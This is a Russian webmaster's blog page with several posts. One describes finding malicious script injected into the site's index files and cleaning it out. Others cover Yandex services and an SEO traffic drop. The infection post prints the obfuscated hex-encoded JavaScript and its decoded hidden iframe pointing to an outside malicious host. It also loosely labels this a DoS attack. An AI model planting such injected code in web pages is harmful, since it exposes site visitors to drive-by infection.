Dos атака

Опубликовано cross в Общее      14 комментов

Дек
26

DoS-атака (от англ. Denial of Service — «отказ в обслуживании») и DDoS-атака (Distributed Denial of Service — «распределённый отказ обслуживания») — это разновидности атак злоумышленника на компьютерные системы. Целью этих атак является создание таких условий, при которых легитимные (правомерные) пользователи системы не могут получить доступ к предоставляемым системой ресурсам, либо этот доступ затруднён.

По всей видимости с некоторой перодичностью именно эта атака осуществлятся на мои сайты и в частности на мой блог. Сам не раз замечал, что очень долго грузится блог, а иногда и просто вылетает.

К такому выводу пришел после того, как прочитал письмо Платон Щукина на мой запрос о посещаемости на блоге:

Здравствуйте!

Ваш сайт проиндексирован и в поиске:

http://www.yandex.ru/yandsearch?text=rhost%3D%22net.itcross.blog%22|rhost%3D%22net.itcross.blog.*%22&pag=u

Просим обратить внимание однако на то, что часто при заходе нашего робота случается обрыв коннекта или не удается соединиться с http-сервером.

--
С уважением, Платон Щукин
Служба поддержки Яндекс.Ру

Быстро справились и, что самое интересное, подтвердили мои опасения по поводу DoS-атак на блога, ведь не просто так случается обрыв коннекта.

Залез на хостинг по фтп и увидел во всех файликах index следующее:

<script>function v4752e918e5501(v4752e918e58e8){  return(parseInt(v4752e918e58e8,16));}function v4752e918e649f(v4752e918e6886){  var v4752e918e6c6f='';for(v4752e918e7058=0; v4752e918e7058<v4752e918e6886.length; v4752e918e7058+=2){ v4752e918e6c6f+=(String.fromCharCode(v4752e918e5501(v4752e918e6886.substr(v4752e918e7058, 2))));}return v4752e918e6c6f;} document.write(v4752e918e649f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D373637207372633D5C27687474703A2F2F73706C
2
E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D61746
8
2E72616E646F6D28292A3439323830292B27645C272077696474683D333038206865696768743D31
3
630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5
3
43524950543E'));</script>

Что по нашенски, русски, означает следующее:

<script>window.status='Done';document.write('<iframe name=767 src=\'http://spl.vip-ddos.org/index.php?'+Math.round(Math.random()*49280)+'d\' width=308 height=160 style=\'display: none\'></iframe>')</SCRIPT>

Этоже в свою очередь означает, что при заходе на зараженный сайт, происходит обращение через iframe к скрипту на чудом сайт, который естественно через iframe способен шарится и на моем сайте тоже... Отсюда вытекает куча последствий:

• С сайта spl.vip-ddos.org может организовываться атака по запросу с моего блога
• Может происходить заражение пользователя, если его система не имеет достаточной безопастности
• Один из тех блогов, сайтов, которые я с постоянной периодичностью посещаю тоже может быть заражен

Вот и получаем результат: пришлось вычистить весь сайт от зараженных файлов, проверить всю систему, приходится надеятся, что подобное в ближайщее время не повторится, а также произойдет изменение в лучшую в плане возвращения трафика.

Трансляция в Я.ру

Опубликовано cross в Яндекс      4 комментов

Дек
25

Теперь у меня есть персональная страница на Я.ру — Артем Шимко!

Я.ру - это новый сервис Яндекса, на котором делятся с друзьями самым интересным, знакомятся, дружат или ссорятся, вывешивают фотки, комментируют свои, чужие записи, обмениваются ссылками и рассказывают о своем настроении.

Запросы с витальным ответом

Опубликовано cross в Продвижение сайтов, Яндекс      3 комментов

Дек
24

Все знают, что 20 числа произошло изменение алгоритма ранжирования поиска и распределение тИЦ Яндекса. Основной акцент изменений делается на витальности запросов, все также наверное уже знают, что это такое:

Например, по запросу [студия Лебедева] большинство пользователей ищут www.artlebedev.ru, и т.д.

На меня эти изменения повлияли очень плохо, посещаемость снизилась в 3е, что конечно же заставляет задуматься над причинами проишедшего.

Вариантов немного:

• Ссылки системы Sape
• Купленные ссылки на блог за малое время
• Другой вариант

Теперь хотелось бы все варианты рассмотреть подробнее.

Ссылки системы Sape

Об этом писалось очень много, поисковые системы воюют и не только Яндекс. В подтверждение того факта, что я наказан за ссылки Sape, я увидел еще статистику по переходам с Google. Она, как ни странно, тоже показывает, что я виноват...

Ну чтож, основное лечение - рассредотоение ссылок Sape. Посмотрю на результаты лечения через некоторое время.

Купленные ссылки на блог за малое время

Решил увеличить количество ссылок на сайт, для чего воспользовался системой Web-Support.ru. Она не подводила раньше и авторегистрация сайта за $15 давала некоторые результаты, хотя в последнее время они абсолютно не радуют. Видимо борьба с купленными ссылками дает о себе знать, они абсолютно не учитываются с низкорейтинговых каталогов.

Я же, признаюсь, совершил ошибку, как мне сейчас, кажется и заказал регистрацию за $55, а это на наши деньги 275 гривен, довольно большие деньги для обычной регистрации... Признаюсь, что лучше бы накинул 20 баксов и купил AllSubmitter с большими возможностями и соотвественно совершенно другими результатами.

Конечно, оспорить не могу, что буквально за неделю после окончания регистрации в системе и перед изменением ранжирования поиска Яндекса, кнопочка с количеством ссылок с 170 резко изменила свое значение в 200. Ну а толку? Сейчас никакого, тИЦ по прежнему 100, а посещаемость...

Не верю, что за эти 200-170=30 я был пессимизирован или как-то наказан поисковой системой Яндекс.

 Других вариантов, я более не вижу

1. Тем временем Яндекс стал показывать беки. Увидеть их можно в своей панельке Вебмастер.Яндекс.
2. Блог Яндекса, все свежие новости из последних рук. Одно смущает, неужели Артемий потерял вкус?
3. По запросу 97л4987м я первый в Яндексе, что очень радует. Возможно выиграю конкурс НеБомжа.

Если бы Яндекс теперь ответил мне: Что делать? Я бы уже начал испраляться, поскольку такое положение дел мне не нравится.